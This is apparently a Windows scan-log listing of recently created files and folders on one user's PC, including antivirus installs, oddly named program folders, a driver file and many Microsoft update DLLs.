2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\Common Files\AVG
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\AVG
2020-08-29 22:37 - 2020-09-03 16:57 - 000000000 ____D C:\ProgramData\AVG
2020-08-29 22:37 - 2020-08-29 22:37 - 000271696 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Milan\Downloads\avg_antivirus_free_setup.exe
2020-08-29 18:07 - 2020-08-29 22:38 - 000000000 ____D C:\Users\Milan\AppData\Roaming\3k52z4f5aim
2020-08-29 18:07 - 2020-08-29 22:37 - 000000000 ____D C:\Program Files\M3PY0PHHSX
2020-08-29 17:53 - 2020-08-29 17:53 - 000025368 _____ (FsFilter Network) C:\WINDOWS\0246CDED558E.sys
2020-08-29 17:52 - 2020-09-10 07:43 - 000001039 _____ C:\Users\Milan\Desktop\ScrSnap.lnk
2020-08-29 17:52 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Local\ScrSnap
2020-08-29 17:51 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Roaming\npy4omvvn5m
2020-08-29 17:50 - 2020-08-29 22:44 - 000000000 ____D C:\Users\Milan\AppData\Roaming\0246cded558e
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Local\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2020-08-29 17:30 - 2020-08-29 22:42 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-08-29 17:30 - 2020-08-29 22:41 - 000000000 ___HD C:\WINDOWS\rss
2020-08-29 17:30 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\oudvj15abkf
2020-08-29 17:30 - 2020-08-29 17:30 - 000000000 ____D C:\ProgramData\Lavasoft
2020-08-29 17:29 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\oizjd
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\Program Files (x86)\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:34 - 000000000 ____D C:\Program Files (x86)\Convertilla
2020-08-29 17:29 - 2020-08-29 17:29 - 000000000 ____D C:\Program Files (x86)\DiskFixer
2020-08-27 23:00 - 2020-08-28 00:46 - 1959706735 _____ C:\Users\Milan\Downloads\Zeme.a.krev-Earth.and.Blood.2020.1080p.WEB.x264.DDP5.1.CZ.TITULKY-FCKR.mkv
2020-08-27 10:12 - 2020-08-27 11:16 - 1141266433 _____ C:\Users\Milan\Downloads\Ghosts.Of.War.2020.titl.ve filmu-kirikos1.mp4
2020-08-26 23:01 - 2020-08-29 16:26 - 000000000 ____D C:\Users\Milan\Desktop\Tanky
2020-08-24 09:09 - 2020-08-15 18:12 - 045761304 _____ C:\Users\Milan\Downloads\Maly_Modelarz_2005-04-06_-_Bismarck.rar
2020-08-15 17:41 - 2020-08-15 17:41 - 000000000 ____D C:\Users\Milan\Desktop\OH-13
2020-08-15 17:32 - 2020-08-15 17:32 - 006094091 _____ C:\Users\Milan\Downloads\Hrad Rokštejn.pdf
2020-08-15 08:34 - 2020-08-15 08:34 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-08-15 08:34 - 2020-08-10 10:38 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-08-15 08:34 - 2020-08-10 10:37 - 000905528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-08-15 08:06 - 2020-08-15 08:06 - 002510856 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019852288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019812352 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 018032128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007758848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007270912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 006294528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005904896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005013504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004859904 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004611072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004129408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003822592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003637760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003516416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002950808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-08-12 19:45 - 2020-08-12 19:45 - 002588688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002422384 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002259192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002138280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 001870200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001418832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001012792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000941568 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000738064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000724480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000692224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000666280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WalletService.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000359496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000343408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnphost.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000309248 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrahc.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\net1.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdSSDP.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\udhisapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnpcont.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msisip.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msisip.dll
2020-08-12 19:44 - 2020-08-12 19:45 - 022642688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 025903104 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 017792512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 014820352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 009932088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 007915864 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007850784 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007583272 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007297536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007270728 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006526448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006436864 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006074552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005946368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005849872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005767224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005283776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005111296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005003824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 004625184 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004565248 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 004005376 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003974376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 003806208 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003743056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003727872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003712000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003581240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003368616 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003141632 _____ (Microsoft Corporation) C:\WINDOWS\system32\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003084800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002808832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002799104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002766952 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-08-12 19:44 - 2020-08-12 19:44 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002737664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002717696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002698048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002583496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002576896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002552120 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002523136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002471936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002307584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002289152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002260312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002136064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002096128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002085632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002022400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001885184 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001756592 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001751040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001743680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001740800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001672544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001669344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001665024 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001660536 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001654312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001512848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001482568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001420320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001406464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001393960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001366144 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001338368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001319936 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001282872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001274128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001215488 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdclt.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001197056 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdengin2.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001182248 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001182208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001149712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001123344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001101312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001077048 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001072128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001059328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001055232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001009664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000995840 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000917800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000914432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000897648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000894032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000888352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875424 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000867840 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000823744 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000822800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
